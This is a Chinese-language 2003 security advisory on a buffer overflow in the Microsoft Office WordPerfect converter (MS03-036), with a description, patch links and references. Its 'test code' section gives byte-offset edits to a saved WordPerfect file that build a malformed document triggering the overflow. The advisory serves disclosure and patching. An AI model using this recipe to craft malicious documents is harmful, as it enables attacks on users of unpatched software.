Microsoft WordPerfect Converter远程缓冲区溢出问题发布时间:2003-09-02 更新时间:2003-09-02 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:客户机模式 受影响系统 Microsoft Office 97详细描述 Microsoft Office提供多个转换器可帮助非OFFCIE默认格式来转化成可处理文件。 Microsoft WordPerfect converter在处理Corel? WordPerfect文档时存在漏洞,由于这个转换器在打开文档时没有正确验证部分参数,攻击者构建恶意文档,当用户处理时可发生缓冲区溢出。Microsoft Word、Microsoft PowerPoint、Publisher和Microsoft Works Suite都使用Microsoft Office WordPerfect converter。 测试代码 1,打开Word,把wordPerfect 5.0文件保存。 2,使用任何编辑器打开.doc文档: ADDRESS 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 0123456789ABCDEF ---------------------------------------------------------------------------- -- 00000000 FF 57 50 43 6D 02 00 00 01 0A 00 00 00 00 00 00 .WPCm........... ... 00000130 00 00 00 00 CD 01 00 00 08 00 02 00 00 00 CD 01 ................ ... 000001C0 61 75 74 68 6F 72 00 65 45 79 65 00 00 00 00 FB author.eEye..... 000001D0 FF 05 00 32 00 00 00 00 00 01 01 6C 00 00 00 01 ...2.......l.... 000001E0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3,在0x00000139偏移中修改0x00为0x01。 4,在0x000001D8偏移中修改0x00,大于0x80。 5,在0x000001E1到0x000001FF偏移中修改0x00,大于0x01。 6,在文件最后追加垃圾数据。 解决方案 补丁下载: Office XP, FrontPage 2002, Publisher 2002, Works 2002, and Works 2003: http://microsoft.com/downloads/details.aspx?FamilyId=EC563DEE-6BFB-431D-B39E-2D672C0C223F&displaylang=en Office 2000, FrontPage 2000, Publisher 2000, and Works 2001: http://microsoft.com/downloads/details.aspx?FamilyId=D3ED4189-315A-411A-A739-F7181310FBA7&displaylang=en Office 97 and Word 98(J): 要了解怎样获取Word 97和Word 98(J)信息可参看如下Microsoft Knowledge Base article: http://support.microsoft.com/default.aspx?scid=kb;en-us;827656 Microsoft建议用户访问Office更新站点http://www.office.microsoft.com/ProductUpdates/default.aspx来检测和安装安全补丁。 相关信息 参考:http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-036.asp http://marc.theaimsgroup.com/?l=bugtraq&m=106261952827573&w=2 |
